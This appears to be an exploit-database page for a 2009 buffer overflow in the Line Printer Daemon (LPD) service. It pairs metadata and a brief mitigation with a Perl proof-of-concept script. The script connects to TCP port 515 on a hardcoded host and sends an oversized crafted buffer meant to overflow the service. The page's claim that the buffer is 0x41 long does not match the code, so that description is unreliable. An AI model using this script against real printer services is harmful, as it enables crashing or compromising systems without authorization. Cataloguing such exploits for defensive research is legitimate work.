header-logo
Suggest Exploit
vendor:
LPD
by:
Protek Research Lab
7,5
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: LPD
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2009-0228
CPE: //a:lpd
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux, Windows
2009

LPD Buffer Overflow Exploit

This exploit is a proof-of-concept code for a buffer overflow vulnerability in the Line Printer Daemon (LPD) service. The vulnerability is triggered when a maliciously crafted print job is sent to the LPD service. The code sends a buffer of length 0x41 to the LPD service, which causes a buffer overflow and can lead to arbitrary code execution.

Mitigation:

Disable the LPD service if it is not needed. If it is needed, ensure that it is running the latest version of the software.
Source

Exploit-DB raw data:

#!/usr/bin/perl

## Source:
## http://www.protekresearchlab.com/index.php?option=com_content&view=article&id=21&Itemid=21

use Getopt::Std;
use IO::Socket::INET;

$SIG{INT}  = \&abort;

my $host  = '10.102.3.79';
my $port  = 515;
my $proto = 'tcp';
my $sockType = SOCK_STREAM;
my $timeout = 1;


my %opt;
my $opt_string = 'hH:P:t:';
getopts( "$opt_string", \%opt );

if (defined $opt{h}) {
    usage()
}

my @commands = (
{Command => 'Send',
 Data => "\x01\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x44\x43\x42\x41\x0a"},

);

my $sock = new IO::Socket::INET (	
                PeerAddr => $host,
				        PeerPort => $port, 
				        Proto => $proto,
                Type => $sockType,
                Timeout => $timeout,
            ) 
    or die "socket error: $!\n\n";

print "connected to: $host:$port\n";

$sock->autoflush(1);
binmode $sock;


foreach my $command (@commands)
{
    if ($command->{'Command'} eq 'Receive')
    {
        my $buf = receive($sock, $timeout);
        if (length $buf)
        {
            print "received: [$buf]\n";
        }
    }
    elsif ($command->{'Command'} eq 'Send')
    {
        print "sending: [".$command->{'Data'}."]\n";
        send ($sock, $command->{'Data'}, 0) or die "send failed, reason: $!\n";
    }
}


close ($sock);

Navigation

Suggest Exploit

Services By CQR